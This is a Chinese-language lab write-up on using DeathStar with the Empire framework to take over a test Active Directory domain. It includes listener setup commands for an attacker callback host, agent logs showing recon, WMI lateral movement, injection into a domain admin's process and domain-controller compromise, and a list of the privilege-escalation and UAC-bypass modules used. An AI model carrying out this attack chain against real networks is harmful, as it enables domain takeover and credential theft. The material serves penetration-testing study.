DeathStar is a Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments using a variety of techinques. https://github.com/byt3bl33d3r/DeathStar

环境介绍

• web服务——windows 2008 r2——192.168.138.141
• 客户端——windows 2003 r2——192.168.138.128
• 域控——windows 2008 r2——192.168.138.140
• 攻击——kali，安装了empire和DeathStar

新建一个普通域用户test，登陆到
注意: 需要手动修改empire框架中的监听器DeathStar，重启监听器以便让新配置生效

(Empire: listeners) > edit DeathStar Host http://192.168.138.136:8080
(Empire: listeners) > edit DeathStar Port 8080
(Empire: listeners) > disable DeathStar
(Empire: listeners) > enable DeathStar

开始

DeathStar通过rest与empire连接，当empire有一个agent回连之后，DeathStar就开始工作了。

然而因为测试环境中出现的超长用户名，导致DeathStar出错，简单处理下异常代码就可以接着跑了（图略）。

注意：因为普通的域用户权限很低，无法进行凭据读取的操作，第一次失败了。

于是将域用户test加入到windows2003和windows2008的本机管理员组，再执行一遍。

在window2003（192.168.138.128）上获取域环境信息，并尝试获取本机已有的凭据。

[+] New Agent => Name: MTLV2E6X IP: 192.168.138.128 HostName: WIN2003 UserName: PENTEST\test HighIntegrity: 1
[*] Agent: MTLV2E6X => Starting recon
[+] Agent: MTLV2E6X => Got domain SID: S-1-5-21-3356271140-971267009-3247355629
[+] Agent: MTLV2E6X => Found 1 members of the Domain Admins group: ['PENTEST\\Administrator']
[+] Agent: MTLV2E6X => Found 1 Domain Controllers: ['dc.pentest.com']
[+] Agent: MTLV2E6X => Found 0 active admin sessions: []
[+] Agent: MTLV2E6X => Found 4 users logged into localhost: ['WIN2003\\web1545978444188', 'WIN2003\\web1545980367000', 'WIN2003\\web1545978429531', 'PENTEST\\test']
[*] Agent: MTLV2E6X => Starting lateral movement
[*] Agent: MTLV2E6X => Starting domain privesc
[+] Agent: MTLV2E6X => Enumerated 1 processes
[*] Agent: MTLV2E6X => Spawning new Agent using CredID 6
[*] Agent: MTLV2E6X => Spawning new Agent using CredID 7
[+] Agent: MTLV2E6X => Found 0 GPO(s) containing credentials using GPP SYSVOL privesc
[+] Agent: MTLV2E6X => Current security context has admin access to 2 hosts

利用wmi横移到windows2008（192.168.138.141）上面。发现并注入到域管理员运行的进程。

[DEBUG] Agent: MTLV2E6X => Executed Module => success: True taskID: 11 msg: 'tasked agent MTLV2E6X to run module powershell/lateral_movement/invoke_wmi'
[+] New Agent => Name: 24REVLAS IP: 192.168.138.141 HostName: WEB UserName: PENTEST\test HighIntegrity: 1
[+] Agent: 24REVLAS => Found 2 users logged into localhost: ['PENTEST\\Administrator', 'WEB\\mysql']
[+] Agent: 24REVLAS => Found Domain Admin logged in: PENTEST\Administrator
[*] Agent: 24REVLAS => Starting domain privesc
[+] Agent: 24REVLAS => Enumerated 1 processes
[*] Agent: 24REVLAS => Found process 1644 running under PENTEST\administrator
[*] Agent: 24REVLAS => PSInjecting into process 1644

注入成功之后产生一个新的agent，为域管理员权限，可以进入3台主机

[+] Agent: 24REVLAS => Found 0 GPO(s) containing credentials using GPP SYSVOL privesc
[+] New Agent => Name: 5F2CHEDZ IP: 192.168.138.141 HostName: WEB UserName: PENTEST\administrator HighIntegrity: 1
[+] Agent: 5F2CHEDZ => Found 2 users logged into localhost: ['PENTEST\\Administrator', 'WEB\\mysql']
[+] Agent: 5F2CHEDZ => Found Domain Admin logged in: PENTEST\Administrator
[*] Agent: 5F2CHEDZ => Starting lateral movement
[*] Agent: 5F2CHEDZ => Starting domain privesc
[+] Agent: 5F2CHEDZ => Enumerated 1 processes
[+] Agent: 5F2CHEDZ => Found 0 GPO(s) containing credentials using GPP SYSVOL privesc
[+] Agent: 5F2CHEDZ => Current security context has admin access to 3 hosts

成功登陆域控服务器

[+] New Agent => Name: WY9A1DC7 IP: 192.168.138.140 HostName: DC UserName: PENTEST\Administrator HighIntegrity: 1

[+] Agent: WY9A1DC7 => Got Domain Admin via security context - agent using domain admin account in high integrity process!

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

获取的agent，有先后顺序

换个方式横移——GPO

组策略的所有配置信息都存放在GPO（Group Policy Object，组策略对象）中，组策略被视为Active Directory中的一种特殊对象，可以将GPO和活动目录的容器（站点、域和OU）连接起来，以影响容器中的用户和计算机。组策略是通过组策略对象来进行管理的。

统一设置了每台服务器的本机管理员(uid500)的密码，并将域用户test从本机管理员组踢出。
empire关闭所有agent，creds remove all清除已保存的凭据。
因为进程注入需要一个存活的域用户进程，而windows2003没法快速切换用户，所以这次从windows2008开始漫游。

可惜的是因为empire的问题漫游终止了。

查看agent的job，这里获取的是域策略设置的本机管理员密码，而域里面的每台主机不一定会执行这个策略，所以需要一个empire模块get_gpo_computer.py来获取执行了策略的主机，查看哪些主机是域管理员登陆过的，再横移过去。

总结

可以查看DeathStar里面的代码，依次执行了什么empire的哪些模块，再单独手工操练。

1. powershell/management/get_domain_sid
2. powershell/situational_awareness/network/powerview/get_group_member
3. powershell/situational_awareness/network/powerview/get_domain_controller
4. powershell/situational_awareness/network/powerview/user_hunter
5. powershell/situational_awareness/network/powerview/get_loggedon
6. powershell/privesc/gpp
7. powershell/privesc/bypassuac_eventvwr
8. powershell/situational_awareness/network/powerview/find_localadmin_access
   等等